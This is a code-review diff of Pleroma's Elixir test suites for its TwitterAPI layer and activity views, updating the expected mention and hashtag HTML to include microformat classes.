	],
	"uuid" => 1
	}

	object = Repo.insert!(%Object{data: object_data})

	input = %{
	"status" =>
	"Hello again, @shp.<script></script>\nThis is on another :moominmamma: line. #2hu #epic #phantasmagoric",
	"media_ids" => [object.id]
	}

	{:ok, activity = %Activity{}} = TwitterAPI.create_status(user, input)

	expected_text =
	- "Hello again, <span><a data-user='#{mentioned_user.id}' class='mention' href='shp'>@<span>shp</span></a></span>.<script></script><br>This is on another :moominmamma: line. <a data-tag='2hu' href='http://localhost:4001/tag/2hu' rel='tag'>#2hu</a> <a data-tag='epic' href='http://localhost:4001/tag/epic' rel='tag'>#epic</a> <a data-tag='phantasmagoric' href='http://localhost:4001/tag/phantasmagoric' rel='tag'>#phantasmagoric</a><br><a href=\"http://example.org/image.jpg\" class='attachment'>image.jpg</a>"
	+ "Hello again, <span class='h-card'><a data-user='#{mentioned_user.id}' class='u-url mention' href='shp'>@<span>shp</span></a></span>.<script></script><br>This is on another :moominmamma: line. <a class='hashtag' data-tag='2hu' href='http://localhost:4001/tag/2hu' rel='tag'>#2hu</a> <a class='hashtag' data-tag='epic' href='http://localhost:4001/tag/epic' rel='tag'>#epic</a> <a class='hashtag' data-tag='phantasmagoric' href='http://localhost:4001/tag/phantasmagoric' rel='tag'>#phantasmagoric</a><br><a href=\"http://example.org/image.jpg\" class='attachment'>image.jpg</a>"

	assert get_in(activity.data, ["object", "content"]) == expected_text
	assert get_in(activity.data, ["object", "type"]) == "Note"
	assert get_in(activity.data, ["object", "actor"]) == user.ap_id
	assert get_in(activity.data, ["actor"]) == user.ap_id
	assert Enum.member?(get_in(activity.data, ["cc"]), User.ap_followers(user))

	assert Enum.member?(
	get_in(activity.data, ["to"]),
	"https://www.w3.org/ns/activitystreams#Public"
	)

	assert Enum.member?(get_in(activity.data, ["to"]), "shp")
	assert activity.local == true

	assert %{"moominmamma" => "http://localhost:4001/finmoji/128px/moominmamma-128.png"} =
	activity.data["object"]["emoji"]

	# hashtags
	assert activity.data["object"]["tag"] == ["2hu", "epic", "phantasmagoric"]

	# Add a context
	assert is_binary(get_in(activity.data, ["context"]))
	assert is_binary(get_in(activity.data, ["object", "context"]))

	assert is_list(activity.data["object"]["attachment"])

	assert activity.data["object"] == Object.get_by_ap_id(activity.data["object"]["id"]).data

	user = User.get_by_ap_id(user.ap_id)

	assert user.info.note_count == 1
	end

	test "create a status that is a reply" do
	user = insert(:user)

	input = %{
	"status" => "Hello again."
	}

	{:ok, activity = %Activity{}} = TwitterAPI.create_status(user, input)

	input = %{
	"status" => "Here's your (you).",
	"in_reply_to_status_id" => activity.id
	}

	{:ok, reply = %Activity{}} = TwitterAPI.create_status(user, input)

	assert get_in(reply.data, ["context"]) == get_in(activity.data, ["context"])

	assert get_in(reply.data, ["object", "context"]) ==
	get_in(activity.data, ["object", "context"])

	assert get_in(reply.data, ["object", "inReplyTo"]) == get_in(activity.data, ["object", "id"])
	assert get_in(reply.data, ["object", "inReplyToStatusId"]) == activity.id
	end

	test "Follow another user using user_id" do
	user = insert(:user)
	followed = insert(:user)

	{:ok, user, followed, _activity} = TwitterAPI.follow(user, %{"user_id" => followed.id})
	assert User.ap_followers(followed) in user.following

	{:error, msg} = TwitterAPI.follow(user, %{"user_id" => followed.id})
	assert msg == "Could not follow user: #{followed.nickname} is already on your list."
	end

	test "Follow another user using screen_name" do
	user = insert(:user)
	followed = insert(:user)

	{:ok, user, followed, _activity} =
	TwitterAPI.follow(user, %{"screen_name" => followed.nickname})

	assert User.ap_followers(followed) in user.following

	followed = User.get_by_ap_id(followed.ap_id)
	assert followed.info.follower_count == 1

	{:error, msg} = TwitterAPI.follow(user, %{"screen_name" => followed.nickname})
	assert msg == "Could not follow user: #{followed.nickname} is already on your list."
	end

	test "Unfollow another user using user_id" do
	unfollowed = insert(:user)
	user = insert(:user, %{following: [User.ap_followers(unfollowed)]})
	ActivityPub.follow(user, unfollowed)

	{:ok, user, unfollowed} = TwitterAPI.unfollow(user, %{"user_id" => unfollowed.id})
	assert user.following == []

	{:error, msg} = TwitterAPI.unfollow(user, %{"user_id" => unfollowed.id})
	assert msg == "Not subscribed!"
	end

	test "Unfollow another user using screen_name" do
	unfollowed = insert(:user)
	user = insert(:user, %{following: [User.ap_followers(unfollowed)]})

	ActivityPub.follow(user, unfollowed)

	{:ok, user, unfollowed} = TwitterAPI.unfollow(user, %{"screen_name" => unfollowed.nickname})
	assert user.following == []

	{:error, msg} = TwitterAPI.unfollow(user, %{"screen_name" => unfollowed.nickname})
	assert msg == "Not subscribed!"
	end

	test "Block another user using user_id" do
	user = insert(:user)
	blocked = insert(:user)

	{:ok, user, blocked} = TwitterAPI.block(user, %{"user_id" => blocked.id})
	assert User.blocks?(user, blocked)
	end

	test "Block another user using screen_name" do
	user = insert(:user)
	blocked = insert(:user)

	{:ok, user, blocked} = TwitterAPI.block(user, %{"screen_name" => blocked.nickname})
	assert User.blocks?(user, blocked)
	end

	test "Unblock another user using user_id" do
	unblocked = insert(:user)
	user = insert(:user)
	{:ok, user, _unblocked} = TwitterAPI.block(user, %{"user_id" => unblocked.id})

	{:ok, user, _unblocked} = TwitterAPI.unblock(user, %{"user_id" => unblocked.id})
	assert user.info.blocks == []
	end

	test "Unblock another user using screen_name" do
	unblocked = insert(:user)
	user = insert(:user)
	{:ok, user, _unblocked} = TwitterAPI.block(user, %{"screen_name" => unblocked.nickname})

	{:ok, user, _unblocked} = TwitterAPI.unblock(user, %{"screen_name" => unblocked.nickname})
	assert user.info.blocks == []
	end

	test "upload a file" do
	user = insert(:user)

	file = %Plug.Upload{
	content_type: "image/jpg",
	path: Path.absname("test/fixtures/image.jpg"),
	filename: "an_image.jpg"
	}

	response = TwitterAPI.upload(file, user)

	assert is_binary(response)
	end

	test "it favorites a status, returns the updated activity" do
	user = insert(:user)
	note_activity = insert(:note_activity)

	{:ok, status} = TwitterAPI.fav(user, note_activity.id)
	updated_activity = Activity.get_by_ap_id(note_activity.data["id"])

	assert status == updated_activity
	end

	test "it unfavorites a status, returns the updated activity" do
	user = insert(:user)
	note_activity = insert(:note_activity)
	object = Object.get_by_ap_id(note_activity.data["object"]["id"])

	{:ok, _like_activity, _object} = ActivityPub.like(user, object)
	updated_activity = Activity.get_by_ap_id(note_activity.data["id"])

	assert ActivityView.render("activity.json", activity: updated_activity)["fave_num"] == 1

	{:ok, activity} = TwitterAPI.unfav(user, note_activity.id)

	assert ActivityView.render("activity.json", activity: activity)["fave_num"] == 0
	end

	test "it retweets a status and returns the retweet" do
	user = insert(:user)
	note_activity = insert(:note_activity)

	{:ok, status} = TwitterAPI.repeat(user, note_activity.id)
	updated_activity = Activity.get_by_ap_id(note_activity.data["id"])

	assert status == updated_activity
	end

	test "it unretweets an already retweeted status" do
	user = insert(:user)
	note_activity = insert(:note_activity)

	{:ok, _status} = TwitterAPI.repeat(user, note_activity.id)
	{:ok, status} = TwitterAPI.unrepeat(user, note_activity.id)
	updated_activity = Activity.get_by_ap_id(note_activity.data["id"])

	assert status == updated_activity
	end

	test "it registers a new user and returns the user." do
	data = %{
	"nickname" => "lain",
	"email" => "lain@wired.jp",
	"fullname" => "lain iwakura",
	"password" => "bear",
	"confirm" => "bear"
	}

	{:ok, user} = TwitterAPI.register_user(data)

	fetched_user = Repo.get_by(User, nickname: "lain")

	assert UserView.render("show.json", %{user: user}) ==
	UserView.render("show.json", %{user: fetched_user})
	end

	test "it registers a new user with empty string in bio and returns the user." do
	data = %{
	"nickname" => "lain",
	"email" => "lain@wired.jp",
	"fullname" => "lain iwakura",
	"bio" => "",
	"password" => "bear",
	"confirm" => "bear"
	}

	{:ok, user} = TwitterAPI.register_user(data)

	fetched_user = Repo.get_by(User, nickname: "lain")

	assert UserView.render("show.json", %{user: user}) ==
	UserView.render("show.json", %{user: fetched_user})
	end

	@moduletag skip: "needs 'account_activation_required: true' in config"
	test "it sends confirmation email if :account_activation_required is specified in instance config" do
	setting = Pleroma.Config.get([:instance, :account_activation_required])

	unless setting do
	Pleroma.Config.put([:instance, :account_activation_required], true)
	on_exit(fn -> Pleroma.Config.put([:instance, :account_activation_required], setting) end)
	end

	data = %{
	"nickname" => "lain",
	"email" => "lain@wired.jp",
	"fullname" => "lain iwakura",
	"bio" => "",
	"password" => "bear",
	"confirm" => "bear"
	}

	{:ok, user} = TwitterAPI.register_user(data)

	assert user.info.confirmation_pending

	Swoosh.TestAssertions.assert_email_sent(Pleroma.UserEmail.account_confirmation_email(user))
	end

	test "it registers a new user and parses mentions in the bio" do
	data1 = %{
	"nickname" => "john",
	"email" => "john@gmail.com",
	"fullname" => "John Doe",
	"bio" => "test",
	"password" => "bear",
	"confirm" => "bear"
	}

	{:ok, user1} = TwitterAPI.register_user(data1)

	data2 = %{
	"nickname" => "lain",
	"email" => "lain@wired.jp",
	"fullname" => "lain iwakura",
	"bio" => "@john test",
	"password" => "bear",
	"confirm" => "bear"
	}

	{:ok, user2} = TwitterAPI.register_user(data2)

	expected_text =
	- "<span><a data-user='#{user1.id}' class='mention' href='#{user1.ap_id}'>@<span>john</span></a></span> test"
	+ "<span class='h-card'><a data-user='#{user1.id}' class='u-url mention' href='#{user1.ap_id}'>@<span>john</span></a></span> test"

	assert user2.bio == expected_text
	end

	@moduletag skip: "needs 'registrations_open: false' in config"
	test "it registers a new user via invite token and returns the user." do
	{:ok, token} = UserInviteToken.create_token()

	data = %{
	"nickname" => "vinny",
	"email" => "pasta@pizza.vs",
	"fullname" => "Vinny Vinesauce",
	"bio" => "streamer",
	"password" => "hiptofbees",
	"confirm" => "hiptofbees",
	"token" => token.token
	}

	{:ok, user} = TwitterAPI.register_user(data)

	fetched_user = Repo.get_by(User, nickname: "vinny")
	token = Repo.get_by(UserInviteToken, token: token.token)

	assert token.used == true

	assert UserView.render("show.json", %{user: user}) ==
	UserView.render("show.json", %{user: fetched_user})
	end

	@moduletag skip: "needs 'registrations_open: false' in config"
	test "it returns an error if invalid token submitted" do
	data = %{
	"nickname" => "GrimReaper",
	"email" => "death@reapers.afterlife",
	"fullname" => "Reaper Grim",
	"bio" => "Your time has come",
	"password" => "scythe",
	"confirm" => "scythe",
	"token" => "DudeLetMeInImAFairy"
	}

	{:error, msg} = TwitterAPI.register_user(data)

	assert msg == "Invalid token"
	refute Repo.get_by(User, nickname: "GrimReaper")
	end

	@moduletag skip: "needs 'registrations_open: false' in config"
	test "it returns an error if expired token submitted" do
	{:ok, token} = UserInviteToken.create_token()
	UserInviteToken.mark_as_used(token.token)

	data = %{
	"nickname" => "GrimReaper",
	"email" => "death@reapers.afterlife",
	"fullname" => "Reaper Grim",
	"bio" => "Your time has come",
	"password" => "scythe",
	"confirm" => "scythe",
	"token" => token.token
	}

	{:error, msg} = TwitterAPI.register_user(data)

	assert msg == "Expired token"
	refute Repo.get_by(User, nickname: "GrimReaper")
	end

	test "it returns the error on registration problems" do
	data = %{
	"nickname" => "lain",
	"email" => "lain@wired.jp",
	"fullname" => "lain iwakura",
	"bio" => "close the world.",
	"password" => "bear"
	}

	{:error, error_object} = TwitterAPI.register_user(data)

	assert is_binary(error_object[:error])
	refute Repo.get_by(User, nickname: "lain")
	end

	test "it assigns an integer conversation_id" do
	note_activity = insert(:note_activity)
	status = ActivityView.render("activity.json", activity: note_activity)

	assert is_number(status["statusnet_conversation_id"])
	end

	setup do
	Supervisor.terminate_child(Pleroma.Supervisor, Cachex)
	Supervisor.restart_child(Pleroma.Supervisor, Cachex)
	:ok
	end

	describe "context_to_conversation_id" do
	test "creates a mapping object" do
	conversation_id = TwitterAPI.context_to_conversation_id("random context")
	object = Object.get_by_ap_id("random context")

	assert conversation_id == object.id
	end

	test "returns an existing mapping for an existing object" do
	{:ok, object} = Object.context_mapping("random context") \|> Repo.insert()
	conversation_id = TwitterAPI.context_to_conversation_id("random context")

	assert conversation_id == object.id
	end
	end

	describe "fetching a user by uri" do
	test "fetches a user by uri" do
	id = "https://mastodon.social/users/lambadalambda"
	user = insert(:user)
	{:ok, represented} = TwitterAPI.get_external_profile(user, id)
	remote = User.get_by_ap_id(id)

	assert represented["id"] == UserView.render("show.json", %{user: remote, for: user})["id"]

	# Also fetches the feed.
	# assert Activity.get_create_activity_by_object_ap_id("tag:mastodon.social,2017-04-05:objectId=1641750:objectType=Status")
	end
	end
	end
	diff --git a/test/web/twitter_api/views/activity_view_test.exs b/test/web/twitter_api/views/activity_view_test.exs
	index 8b5a16add..3d6b264b1 100644
	--- a/test/web/twitter_api/views/activity_view_test.exs
	+++ b/test/web/twitter_api/views/activity_view_test.exs
	@@ -1,352 +1,354 @@
	# Pleroma: A lightweight social networking server
	# Copyright © 2017-2019 Pleroma Authors <https://pleroma.social/>
	# SPDX-License-Identifier: AGPL-3.0-only

	defmodule Pleroma.Web.TwitterAPI.ActivityViewTest do
	use Pleroma.DataCase

	alias Pleroma.Web.CommonAPI
	alias Pleroma.Web.CommonAPI.Utils
	alias Pleroma.Web.TwitterAPI.ActivityView
	alias Pleroma.Web.TwitterAPI.UserView
	alias Pleroma.Web.TwitterAPI.TwitterAPI
	alias Pleroma.Repo
	alias Pleroma.Activity
	alias Pleroma.User
	alias Pleroma.Web.ActivityPub.ActivityPub

	import Pleroma.Factory
	import Tesla.Mock

	setup do
	mock(fn env -> apply(HttpRequestMock, :request, [env]) end)
	:ok
	end

	import Mock

	test "returns a temporary ap_id based user for activities missing db users" do
	user = insert(:user)

	{:ok, activity} = CommonAPI.post(user, %{"status" => "Hey @shp!", "visibility" => "direct"})

	Repo.delete(user)
	Cachex.clear(:user_cache)

	%{"user" => tw_user} = ActivityView.render("activity.json", activity: activity)

	assert tw_user["screen_name"] == "erroruser@example.com"
	assert tw_user["name"] == user.ap_id
	assert tw_user["statusnet_profile_url"] == user.ap_id
	end

	test "tries to get a user by nickname if fetching by ap_id doesn't work" do
	user = insert(:user)

	{:ok, activity} = CommonAPI.post(user, %{"status" => "Hey @shp!", "visibility" => "direct"})

	{:ok, user} =
	user
	\|> Ecto.Changeset.change(%{ap_id: "#{user.ap_id}/extension/#{user.nickname}"})
	\|> Repo.update()

	Cachex.clear(:user_cache)

	result = ActivityView.render("activity.json", activity: activity)
	assert result["user"]["id"] == user.id
	end

	test "a create activity with a html status" do
	text = """
	#Bike log - Commute Tuesday\nhttps://pla.bike/posts/20181211/\n#cycling #CHScycling #commute\nMVIMG_20181211_054020.jpg
	"""

	{:ok, activity} = CommonAPI.post(insert(:user), %{"status" => text})

	result = ActivityView.render("activity.json", activity: activity)

	assert result["statusnet_html"] ==
	- "<a data-tag=\"bike\" href=\"http://localhost:4001/tag/bike\">#Bike</a> log - Commute Tuesday<br /><a href=\"https://pla.bike/posts/20181211/\">https://pla.bike/posts/20181211/</a><br /><a data-tag=\"cycling\" href=\"http://localhost:4001/tag/cycling\">#cycling</a> <a data-tag=\"chscycling\" href=\"http://localhost:4001/tag/chscycling\">#CHScycling</a> <a data-tag=\"commute\" href=\"http://localhost:4001/tag/commute\">#commute</a><br />MVIMG_20181211_054020.jpg"
	+ "<a class=\"hashtag\" data-tag=\"bike\" href=\"http://localhost:4001/tag/bike\">#Bike</a> log - Commute Tuesday<br /><a href=\"https://pla.bike/posts/20181211/\">https://pla.bike/posts/20181211/</a><br /><a class=\"hashtag\" data-tag=\"cycling\" href=\"http://localhost:4001/tag/cycling\">#cycling</a> <a class=\"hashtag\" data-tag=\"chscycling\" href=\"http://localhost:4001/tag/chscycling\">#CHScycling</a> <a class=\"hashtag\" data-tag=\"commute\" href=\"http://localhost:4001/tag/commute\">#commute</a><br />MVIMG_20181211_054020.jpg"

	assert result["text"] ==
	"#Bike log - Commute Tuesday\nhttps://pla.bike/posts/20181211/\n#cycling #CHScycling #commute\nMVIMG_20181211_054020.jpg"
	end

	test "a create activity with a summary containing emoji" do
	{:ok, activity} =
	CommonAPI.post(insert(:user), %{
	"spoiler_text" => ":woollysocks: meow",
	"status" => "."
	})

	result = ActivityView.render("activity.json", activity: activity)

	expected = ":woollysocks: meow"

	expected_html =
	"<img height=\"32px\" width=\"32px\" alt=\"woollysocks\" title=\"woollysocks\" src=\"http://localhost:4001/finmoji/128px/woollysocks-128.png\" /> meow"

	assert result["summary"] == expected
	assert result["summary_html"] == expected_html
	end

	test "a create activity with a summary containing invalid HTML" do
	{:ok, activity} =
	CommonAPI.post(insert(:user), %{
	"spoiler_text" => "<span style=\"color: magenta; font-size: 32px;\">meow</span>",
	"status" => "."
	})

	result = ActivityView.render("activity.json", activity: activity)

	expected = "meow"

	assert result["summary"] == expected
	assert result["summary_html"] == expected
	end

	test "a create activity with a note" do
	user = insert(:user)
	other_user = insert(:user, %{nickname: "shp"})

	{:ok, activity} = CommonAPI.post(user, %{"status" => "Hey @shp!", "visibility" => "direct"})

	result = ActivityView.render("activity.json", activity: activity)

	convo_id = TwitterAPI.context_to_conversation_id(activity.data["object"]["context"])

	expected = %{
	"activity_type" => "post",
	"attachments" => [],
	"attentions" => [
	UserView.render("show.json", %{user: other_user})
	],
	"created_at" => activity.data["object"]["published"] \|> Utils.date_to_asctime(),
	"external_url" => activity.data["object"]["id"],
	"fave_num" => 0,
	"favorited" => false,
	"id" => activity.id,
	"in_reply_to_status_id" => nil,
	"in_reply_to_screen_name" => nil,
	"in_reply_to_user_id" => nil,
	"in_reply_to_profileurl" => nil,
	"in_reply_to_ostatus_uri" => nil,
	"is_local" => true,
	"is_post_verb" => true,
	"possibly_sensitive" => false,
	"repeat_num" => 0,
	"repeated" => false,
	"pinned" => false,
	"statusnet_conversation_id" => convo_id,
	"summary" => "",
	"summary_html" => "",
	"statusnet_html" =>
	- "Hey <span><a data-user=\"#{other_user.id}\" href=\"#{other_user.ap_id}\">@<span>shp</span></a></span>!",
	+ "Hey <span class=\"h-card\"><a data-user=\"#{other_user.id}\" class=\"u-url mention\" href=\"#{
	+ other_user.ap_id
	+ }\">@<span>shp</span></a></span>!",
	"tags" => [],
	"text" => "Hey @shp!",
	"uri" => activity.data["object"]["id"],
	"user" => UserView.render("show.json", %{user: user}),
	"visibility" => "direct"
	}

	assert result == expected
	end

	test "a list of activities" do
	user = insert(:user)
	other_user = insert(:user, %{nickname: "shp"})
	{:ok, activity} = CommonAPI.post(user, %{"status" => "Hey @shp!"})

	convo_id = TwitterAPI.context_to_conversation_id(activity.data["object"]["context"])

	mocks = [
	{
	TwitterAPI,
	[],
	[context_to_conversation_id: fn _ -> false end]
	},
	{
	User,
	[:passthrough],
	[get_cached_by_ap_id: fn _ -> nil end]
	}
	]

	with_mocks mocks do
	[result] = ActivityView.render("index.json", activities: [activity])

	assert result["statusnet_conversation_id"] == convo_id
	assert result["user"]
	refute called(TwitterAPI.context_to_conversation_id(:_))
	refute called(User.get_cached_by_ap_id(user.ap_id))
	refute called(User.get_cached_by_ap_id(other_user.ap_id))
	end
	end

	test "an activity that is a reply" do
	user = insert(:user)
	other_user = insert(:user, %{nickname: "shp"})

	{:ok, activity} = CommonAPI.post(user, %{"status" => "Hey @shp!"})

	{:ok, answer} =
	CommonAPI.post(other_user, %{"status" => "Hi!", "in_reply_to_status_id" => activity.id})

	result = ActivityView.render("activity.json", %{activity: answer})

	assert result["in_reply_to_status_id"] == activity.id
	end

	test "a like activity" do
	user = insert(:user)
	other_user = insert(:user, %{nickname: "shp"})

	{:ok, activity} = CommonAPI.post(user, %{"status" => "Hey @shp!"})
	{:ok, like, _object} = CommonAPI.favorite(activity.id, other_user)

	result = ActivityView.render("activity.json", activity: like)
	activity = Pleroma.Activity.get_by_ap_id(activity.data["id"])

	expected = %{
	"activity_type" => "like",
	"created_at" => like.data["published"] \|> Utils.date_to_asctime(),
	"external_url" => like.data["id"],
	"id" => like.id,
	"in_reply_to_status_id" => activity.id,
	"is_local" => true,
	"is_post_verb" => false,
	"favorited_status" => ActivityView.render("activity.json", activity: activity),
	"statusnet_html" => "shp favorited a status.",
	"text" => "shp favorited a status.",
	"uri" => "tag:#{like.data["id"]}:objectType=Favourite",
	"user" => UserView.render("show.json", user: other_user)
	}

	assert result == expected
	end

	test "a like activity for deleted post" do
	user = insert(:user)
	other_user = insert(:user, %{nickname: "shp"})

	{:ok, activity} = CommonAPI.post(user, %{"status" => "Hey @shp!"})
	{:ok, like, _object} = CommonAPI.favorite(activity.id, other_user)
	CommonAPI.delete(activity.id, user)

	result = ActivityView.render("activity.json", activity: like)

	expected = %{
	"activity_type" => "like",
	"created_at" => like.data["published"] \|> Utils.date_to_asctime(),
	"external_url" => like.data["id"],
	"id" => like.id,
	"in_reply_to_status_id" => nil,
	"is_local" => true,
	"is_post_verb" => false,
	"favorited_status" => nil,
	"statusnet_html" => "shp favorited a status.",
	"text" => "shp favorited a status.",
	"uri" => "tag:#{like.data["id"]}:objectType=Favourite",
	"user" => UserView.render("show.json", user: other_user)
	}

	assert result == expected
	end

	test "an announce activity" do
	user = insert(:user)
	other_user = insert(:user, %{nickname: "shp"})

	{:ok, activity} = CommonAPI.post(user, %{"status" => "Hey @shp!"})
	{:ok, announce, _object} = CommonAPI.repeat(activity.id, other_user)

	convo_id = TwitterAPI.context_to_conversation_id(activity.data["object"]["context"])

	activity = Repo.get(Activity, activity.id)

	result = ActivityView.render("activity.json", activity: announce)

	expected = %{
	"activity_type" => "repeat",
	"created_at" => announce.data["published"] \|> Utils.date_to_asctime(),
	"external_url" => announce.data["id"],
	"id" => announce.id,
	"is_local" => true,
	"is_post_verb" => false,
	"statusnet_html" => "shp retweeted a status.",
	"text" => "shp retweeted a status.",
	"uri" => "tag:#{announce.data["id"]}:objectType=note",
	"user" => UserView.render("show.json", user: other_user),
	"retweeted_status" => ActivityView.render("activity.json", activity: activity),
	"statusnet_conversation_id" => convo_id
	}

	assert result == expected
	end

	test "A follow activity" do
	user = insert(:user)
	other_user = insert(:user, %{nickname: "shp"})

	{:ok, follower} = User.follow(user, other_user)
	{:ok, follow} = ActivityPub.follow(follower, other_user)

	result = ActivityView.render("activity.json", activity: follow)

	expected = %{
	"activity_type" => "follow",
	"attentions" => [],
	"created_at" => follow.data["published"] \|> Utils.date_to_asctime(),
	"external_url" => follow.data["id"],
	"id" => follow.id,
	"in_reply_to_status_id" => nil,
	"is_local" => true,
	"is_post_verb" => false,
	"statusnet_html" => "#{user.nickname} started following shp",
	"text" => "#{user.nickname} started following shp",
	"user" => UserView.render("show.json", user: user)
	}

	assert result == expected
	end

	test "a delete activity" do
	user = insert(:user)

	{:ok, activity} = CommonAPI.post(user, %{"status" => "Hey @shp!"})
	{:ok, delete} = CommonAPI.delete(activity.id, user)

	result = ActivityView.render("activity.json", activity: delete)

	expected = %{
	"activity_type" => "delete",
	"attentions" => [],
	"created_at" => delete.data["published"] \|> Utils.date_to_asctime(),
	"external_url" => delete.data["id"],
	"id" => delete.id,
	"in_reply_to_status_id" => nil,
	"is_local" => true,
	"is_post_verb" => false,
	"statusnet_html" => "deleted notice {{tag",
	"text" => "deleted notice {{tag",
	"uri" => delete.data["object"],
	"user" => UserView.render("show.json", user: user)
	}

	assert result == expected
	end

	test "a peertube video" do
	{:ok, object} =
	ActivityPub.fetch_object_from_id(
	"https://peertube.moe/videos/watch/df5f464b-be8d-46fb-ad81-2d4c2d1630e3"
	)

	%Activity{} = activity = Activity.get_create_activity_by_object_ap_id(object.data["id"])

	result = ActivityView.render("activity.json", activity: activity)

	assert length(result["attachments"]) == 1
	assert result["summary"] == "Friday Night"
	end
	end

File Metadata

Mime Type: text/x-diff
Expires: Wed, May 14, 7:23 AM (1 d, 14 h)
Storage Engine: blob
Storage Format: Raw Data
Storage Handle: 166715
Default Alt Text: (487 KB)

No OneTemporaryActions

View Options

File Metadata

Event Timeline

No OneTemporary
Actions